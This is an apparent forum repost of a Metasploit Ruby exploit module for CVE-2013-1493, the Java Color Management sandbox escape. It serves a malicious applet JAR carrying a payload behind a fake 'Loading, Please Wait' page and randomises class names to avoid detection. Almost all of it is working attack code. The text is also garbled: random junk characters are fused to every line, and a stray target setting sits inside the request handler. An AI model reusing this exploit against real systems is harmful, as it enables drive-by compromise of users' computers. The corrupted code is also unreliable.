##! M% G; K+ J' |9 l
* t# v4 v, q9 p# This file is part of the Metasploit Framework and may be subject to" h% t* u% O& R) `
# redistribution and commercial restrictions. Please see the Metasploit
0 P6 {1 x8 j+ ^- `& V# web site for more information on licensing and terms of use.
0 }6 B" c& D* D8 o0 Q3 z# http://metasploit.com/
. ^7 K- J* M8 ^* \, ^& E##
: }+ z8 o/ R7 H( ^' B3 Orequire ‘msf/core’
1 \+ x4 G9 H5 H# |require ‘rex’
( b1 i1 J+ ^6 C3 g8 Hclass Metasploit3 < Msf::Exploit::Remote1 p/ O( J6 e' [5 X
Rank = NormalRanking+ b: a, m7 D4 P1 Z8 r5 c3 c. E
include Msf::Exploit::Remote::HttpServer::HTML5 J" c# C% O2 d0 v1 Y6 h
include Msf::Exploit::EXE
+ p8 B" Z/ U5 Z" Cinclude Msf::Exploit::Remote::BrowserAutopwn& A. u7 \4 \/ G( k% R- Q; ^' i$ }
autopwn_info({ :javascript => false })
/ k# [- n3 Y- A0 \% t+ j5 j; [def initialize( info = {} )
$ q# z" G1 Z, c8 K% m# Ysuper( update_info( info,* P. A/ k& H$ \- _
‘Name’ => ‘Java CMM Remote Code Execution’,; t# ]) h& I9 l" r; X3 Q. w
‘Description’ => %q{/ z: b j5 g" `1 i' p+ z! v
This module abuses the Color Management classes from a Java Applet to run# s4 K/ k% H) x) e
arbitrary Java code outside of the sandbox as exploited in the wild in February1 A' \( c# J9 ]
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41/ e0 |$ r- a2 }3 S$ K, d- ^! @
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP15 ^) W) b: L0 S X/ s
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java- L% ^' ?$ x1 D& j* @8 X3 l2 M9 n
warning in order to run the malicious applet.. A/ _' m2 }9 X/ e" \) E0 Z5 F
},9 x/ M. i. X; u
‘License’ => MSF_LICENSE,
! s; H. j& i' [5 U/ C‘Author’ =># c) R$ Q' G2 ]5 t' v' R
'Unknown', # Vulnerability discovery and Exploit
; v3 q1 n2 Y* H* u' w'juan vazquez' # Metasploit module (just ported the published exploit)
) Y5 ? b3 h/ [2 C. K],
; w) [, t0 Y+ R3 B2 z- z1 a' O‘References’ =>7 @' P& y2 t9 P6 e+ ]9 V! F
[- H4 j4 M K# `4 J5 n; T
[ 'CVE', '2013-1493' ],
3 i) d j; C( q m6 w[ 'OSVDB', '90737' ],
, B; }- m$ f; D3 I) {[ 'BID', '58238' ],. w+ W' s8 O" L9 s* {8 v7 N+ |
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],, y8 y8 @1 l+ w! s
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],' X9 J) @8 u6 F8 `
[ 'URL', 'http://pastie.org/pastes/6581034' ]1 n6 |+ @/ j) C* {) n
],5 \7 q) Z | Z' U
‘Platform’ => [ 'win', 'java' ],
- v* {/ K* ^9 L) p: a‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },0 h( U: U9 x% U$ m$ \ H* d
‘Targets’ =>0 }% N8 D7 z+ Y! y! Y7 h- |! H
[& d4 X; ~* ^2 U6 ]. t3 y
[ 'Generic (Java Payload)',
- A6 w: c* M: A4 S{3 Q# ~$ t& Z# `7 H+ H5 s
'Platform' => 'java',
S0 W# X2 J Z# e'Arch' => ARCH_JAVA
- O( E: W/ `9 K0 m( L( k}0 Y9 D" a( G& V" F1 X
],
' S( x* }9 d" l6 l6 K[ 'Windows x86 (Native Payload)',
+ P5 N; B0 r2 ^/ n{
$ _3 L3 m4 c/ ? N9 C'Platform' => 'win',- o$ ]0 Z' R; z- e: p2 \8 r( b1 J
'Arch' => ARCH_X86
1 W; b% E3 J* ^4 z" _5 P}- {$ a* [; B/ O% {. \
]
4 l2 K! s! Y% c8 h; z2 c: G) n5 R],
, \: l; E0 Y* H* N0 K‘‘DisclosureDate’ => ‘Mar 01 2013′
% r) y" o0 ]- G5 t6 o$ A)): K: G7 Y: d, a# B
end% \6 ^" E5 e4 k- Z& D
def setup
. ?& e; E0 f6 F5 }) a+ T6 @3 ^5 gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)6 [1 c; F+ G! I. G! v& n" H6 \
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }' X" n% u+ D. W5 L
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)5 h1 |7 P7 L O
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& Q" D8 V' R Z9 s3 b- Y' P9 O
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
- E' B( f% x+ q. j. h: a@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }8 n' P. P" n- D+ D1 m
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)( \) q# r! |- V# c( D% h! F
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& q% M u4 j0 b4 n
@init_class_name = rand_text_alpha(“Init”.length)* T5 E$ c" Y! ^) V
@init_class.gsub!(“Init”, @init_class_name)
$ t0 K J; }% s/ W* z0 ?super$ H* F+ O' c/ ?6 i
end+ o) n7 q0 {- P# J( ?' C, E4 Z: N5 G
def on_request_uri(cli, request)* l- h A% S! F" s% w7 D: G7 `$ q& @
print_status(“handling request for #{request.uri}”)
6 M$ r6 K% [/ h% v ]+ n+ [case request.uri1 p, t& n, U" b7 Z0 X" Q, r4 @, p
when /\.jar$/i. D) ]. k. ~& k" }4 D% V$ e2 \) l" b
jar = payload.encoded_jar7 ]( G& o6 A; @( g/ J- ^* j
jar.add_file(“#{@init_class_name}.class”, @init_class)+ k' L, H+ m: j/ C; V F T4 v8 n
jar.add_file(“Leak.class”, @leak_class)+ i w: i. P R* p7 C
jar.add_file(“MyBufferedImage.class”, @buffered_image_class); i; x" P$ w# p
jar.add_file(“MyColorSpace.class”, @color_space_class)8 R7 z# `/ ~$ f; Z V
DefaultTarget’ => 1,
8 n. A8 c- u4 N& p/ \metasploit_str = rand_text_alpha(“metasploit”.length)
+ |2 |' s. w( T% g$ E Zpayload_str = rand_text_alpha(“payload”.length)- f& b7 |8 }. ~
jar.entries.each { |entry|8 s& e2 D; {( d+ Z8 a
entry.name.gsub!(“metasploit”, metasploit_str)
3 Y! _0 B2 w9 x- @2 f Hentry.name.gsub!(“Payload”, payload_str)
+ B* z: V4 H4 L7 y7 S yentry.data = entry.data.gsub(“metasploit”, metasploit_str)
6 Y2 q0 ~7 b) gentry.data = entry.data.gsub(“Payload”, payload_str)
! [* H q3 @( B; w$ Y4 L6 \}
. s; A5 K- p7 Ujar.build_manifest: q: s. ~) m$ H( [- c5 b
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
! _% l5 z1 l. a- C: N9 t$ U- Ywhen /\/$/8 W# l( a+ ]5 ~( l. C
payload = regenerate_payload(cli)$ v( }+ R3 [- g' x! z: W5 \
if not payload
% S9 m2 l+ ~, {, }- @print_error(“Failed to generate the payload.”)
0 \+ Y" Y. Q+ E5 \send_not_found(cli)
$ ?# m) [3 L6 ireturn
9 u# H2 k+ q& y* s i+ nend
" ?4 L7 H* o: `! g, [5 qsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })0 ~- `" @+ F/ m0 U
else
# n3 b, \" N' f5 C6 wsend_redirect(cli, get_resource() + ‘/’, ”)
8 C% a% ^! Q1 m; ^5 }end+ a- L( w. b& R( r" \( ~
end3 b7 q8 v E+ i9 g. y0 W
def generate_html
: z/ P6 v. n7 @6 \1 m# _ s5 ohtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|6 w) V0 @, O/ X7 {3 U7 q5 k: _
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|) I' Q5 r: h2 |1 S) N
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|4 Y' u8 K2 a* ^/ M+ ?
html += %Q|</applet></body></html>|
! t9 G# }5 u' J; z: Areturn html: ]6 M/ c( t+ r, E3 G
end! l" J5 f9 \: p j: U1 p
end/ |2 Z7 Y: c) n" K
end
- |0 `5 w) J% D/ W+ A |
发表于 2013-4-4 17:31:17
收藏
支持
反对